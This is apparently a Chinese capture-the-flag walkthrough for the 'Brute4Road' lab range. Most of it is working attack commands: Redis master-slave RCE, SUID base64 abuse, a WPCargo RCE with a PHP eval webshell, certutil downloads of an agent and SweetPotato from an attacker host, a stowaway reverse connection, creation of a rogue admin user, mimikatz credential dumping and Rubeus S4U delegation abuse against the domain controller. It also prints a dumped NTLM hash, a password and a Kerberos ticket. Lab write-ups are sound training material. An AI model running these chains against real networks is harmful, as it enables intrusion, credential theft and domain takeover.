春秋云境-Brute4Road

flag01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[2025-03-09 20:26:33] [INFO] 暴力破解线程数: 1
[2025-03-09 20:26:33] [INFO] 开始信息扫描
[2025-03-09 20:26:33] [INFO] 最终有效主机数量: 1
[2025-03-09 20:26:33] [INFO] 开始主机扫描
[2025-03-09 20:26:34] [INFO] 有效端口数量: 233
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:6379
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:21
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:80
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:22
[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:21 => [ftp] 版本:3.0.2 产品:vsftpd  系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-03-09 20:26:39] [SUCCESS] 服务识别 39.98.127.86:6379 => [redis] 版本:5.0.12 产品:Redis key-value store
[2025-03-09 20:26:39] [SUCCESS] 服务识别 39.98.127.86:80 => [http] 版本:1.20.1 产品:nginx
[2025-03-09 20:26:43] [INFO] 存活端口数量: 4
[2025-03-09 20:26:43] [INFO] 开始漏洞扫描
[2025-03-09 20:26:43] [INFO] 加载的插件: ftp, redis, ssh, webpoc, webtitle
[2025-03-09 20:26:43] [SUCCESS] 网站标题 http://39.98.127.86       状态码:200 长度:4833   标题:Welcome to CentOS
[2025-03-09 20:26:44] [SUCCESS] 匿名登录成功!
[2025-03-09 20:26:46] [SUCCESS] Redis 39.98.127.86:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[2025-03-09 20:26:50] [SUCCESS] Redis无密码连接成功: 39.98.127.86:6379
[2025-03-09 20:27:06] [SUCCESS] 扫描已完成: 5/5

RabR 打 Redis 主从复制

1
python3 redis-attack.py -r 39.98.127.86 -L xxx -P 8088 -b

命令上线 shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[redis@centos-web01 tmp]$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

用 base64 可以 suid 提权:

1
base64 "/home/redis/flag/flag01" | base64 --decode

1
fscan -h 172.22.2.7/24 -eh 127.22.2.7

flag02

http://172.22.2.18 有 wordpress

GitHub - biulove0x/CVE-2021-25003: WPCargo < 6.9.0 - Unauthenticated RCE

打完之后执行

1
2
http://172.22.2.18/wp-content/wp-conf.php?1=system
POST: 2=echo "<?php @eval(\$_POST[1]);?>" >> 1.php

wpuser:WpuserEha8Fgj9

有用户名和密码。

这个还不是 mysql 还是 mysqli

拿到 flag02

flag03

然后这个S0meth1ng_y0u_m1ght_1ntereSted估计是给的密码。拿过来跑一轮 1433 的 sqlserver。

傻逼的是我这里面的密码根本跑不出来,后来上网查了之后才发现不对:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
zyUO1njo
zyPKqVud
Zym5nlcG
ZxvkDGIH
zxa5BGTo
ZVTlQGUc
zuvo1OFm
zujJ9Zci
ztoxp803
zPMDqLBm
zpcaOJen
ZmkVdzer
zlbtFLVe
zJYG1iWb
ZIAu8fkt
zHquA2L9
ZHat2Wfi
ZgUEfMT9
zFW5jMCq
ZfF7L6Ka
# 上面是它给的 下面这个是正确的。。。
ElGNkOiC

mdut 直接连。权限不足。

certutil 下载文件:

1
2
certutil.exe -urlcache -split -f http://172.22.2.7:8888/windows_x64_agent.exe C:/Users/Public/windows_x64_agent.exe
certutil.exe -urlcache -split -f http://172.22.2.7:8888/SweetPotato.exe C:/Users/Public/SweetPotato.exe
1
2
C:/Users/Public/SweetPotato.exe -a "whoami"
C:/Users/Public/SweetPotato.exe -a "C:/Users/Public/windows_x64_agent.exe -c 172.22.2.7:8091 -s 1234 --reconnect 8"

上线 stowaway 。

乱码需要换个字符集:

1
chcp 65001

发现有域环境:

1
net user /domain

先直接尝试添加用户:

1
2
net user natro92 123qwe!@# /add
net localgroup administrators natro92 /add

然后先连下。

flag04

然后后面这个域就不太会打了,照着网上的 wp 打一下。

MSSQLSERVER 配置了到域控的约束委派, 可以通过 S4U 伪造高权限 ST 拿下域控,并且似乎只有他的 NTLM 哈希可用,我们用 Rubeus 申请访问自身的服务票据

管理员运行 mimikatz,获取明文密码:

1
2
privilege::debug
sekurlsa::logonpasswords
1
2
3
4
* Username : MSSQLSERVER$
         * Domain   : XIAORANG
         * NTLM     : 78aa7721aeb225c7495de5a172e0e238
         * SHA1     : 70dabce165b520d598a4ad251db5ebf919aea686

https://github.com/GhostPack/Rubeus

1
>Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78aa7721aeb225c7495de5a172e0e238 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

注入票据:

1
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3/h5OLVOREp9Ul5Ta+XJsueLtKMXRh9nV/PgZexdCp8jG7cVDwhop7nyhbES4z4HgT37XpMqg/Kj61HIZ3iGtsdEI6zAy5nSUOHm63VOMXqny83byqvtXrOrONzBfhvsgg0mRL9O8jlaUFv1WXOE1ZipuNN07hBQwWonmCjgA1ZeCXMNvb4ZQBEcrD+o84txLQ7ml5MsbTRIn3dctRjGY6/TviJHJ7ieUmRWiCE/pI+3niWDvBhdGtDxjJ4Rb6gPaOF52ZGHFtHeTOWLWMnG750vu0t1794vWbE+Ulad1PdCACbknnCbGymJzMAHmyQiHDYFJN3OEaiKey8FeeKg53TWTmVEMh55wbm1V1XGZpZ8U5LEzgAonxaMVDISHJgRzswx6EV1bFDA6kc8QPCYZ9BN/NTlH57hnkwrGslByld0BGnmUJI1Te6W1ii32QsirNU0LmOoXT1sTYuy0eGWrcNWdYJhrnLy0BOkYtkwKHOpPP2aZQ5zqSCQLfsCKVK3nLZpj+27dpccIZ+HK+beZEwDd64bopsxsWbWqZd1oU8q7aX+bE5wd3zcgP8OZBS28cSx4KHfg7J4r0raq7dprA41Db1qbuXjD73Hk/W3pTawODEUSgIofNfAW+tHdLHXrXa8+VCNtELk3nd17zuTR0eH6TIvRp1ySDmpSP8BHyvwml+rR+2Av3NI+QhffTwGTEYP3dv9NbNfEWQKTDy26VnHwhlb/nGkvCEXxwA9V4Dm35WtQwqQWu6g82U0BJgVtFoMWiUbAbFqfmX2hU+ZrTNIA5l807gznC0WBZvoTp+2q3HgALaSs2LMuyOS5fbPN1gsCTuMO4k8KJo8x5kpxBT7Rrrh/3KWsBSbZ9fSFpovXsWUbQHRre6/bdbCttV7gVXIl9SKlLG6J7RtJLPUcjmY1k1KsiJMRx3Pv4Va2DagR9WLohvlpwbjkPaBni3pyU4s4m03ZgtLgmhdpRnwIZk6Cj14ThS5t60aFSvTYL/7r77TwylkrYTxyVMVnmlyNjCk39Sdws5BAwkaOTiNHRCjXt6kzGAZa2pBbJXjrcxecX8PZgSIbzFt3zsGYwxZQu87723UBM3hTz/5BvWUY3o4LVpdOQo+8e7mcGruojNRtWwv0xJafj2Fvo3yhQkc9xHl4pAJX3XEIYaqfVuel9Sk5ge3nGGaxhLw//f4Xw2neG2F7rEKUAT+Eov9/7mYGjo4xK9JzKSlFr6KT4km2o8bg+gkODa98JdiTG6xadjcfVq5dSKaRaJlLDN7jE5bsjlwn+Cpm+smHLR64TH1KF/0IuAJKQBtiLJFByy8w9YZUdEpbSYDQcxGXHgOy0svvfDxJdnD1TK6BnUwxxhSGhDXthpcvW9f7JeHM/0uzIQC/5YjiOa6UmGWQKsnk9T39kALdmjkS8vfjBkPRGuEyotnVSshc88mJe9ZF/dBEpDe4N1m80bO1wpG8N5FujgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCcD9EEnXg39mxbQjtdzNnHoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDMwOTE0MDE0MlqmERgPMjAyNTAzMTAwMDAxNDJapxEYDzIwMjUwMzE2MTQwMTQyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

1
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt